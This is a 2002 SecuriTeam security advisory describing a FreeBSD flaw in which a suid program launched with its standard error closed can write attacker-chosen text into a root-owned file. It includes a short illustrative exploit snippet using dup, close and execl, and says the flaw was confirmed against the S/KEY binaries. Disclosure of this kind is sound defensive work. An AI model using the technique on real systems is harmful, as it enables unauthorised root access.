The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
SUMMARY
It is possible for a local user under the FreeBSD operating system to
execute a suid application with its stdin, stdout, or stderr closed.
DETAILS
Consider the following (imaginary) suid application:
– begin of imaginary code snippet
FILE * f = fopen("/etc/root_owned_file", "r+");
if(f) {
fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);
fclose(f);
}
– end of imaginary code snippet
Now, consider the following (imaginary) exploit:
– begin of imaginary exploit snippet
while(dup(1) != -1);
close(2);
execl("/path/to/suid_application", "this text will endup in the
root_owned_file", 0);
– end of imaginary exploit snippet
Exploitation has been confirmed using the S/KEY binaries.
Impact:
High. Local users should be able to gain root privileges.
Solution:
FreeBSD source trees have been updated on the 21th of april 2002. Please
cvsup.
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> Joost Pol.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
[email protected]
In order to subscribe to the mailing list, simply forward this email to:
[email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages.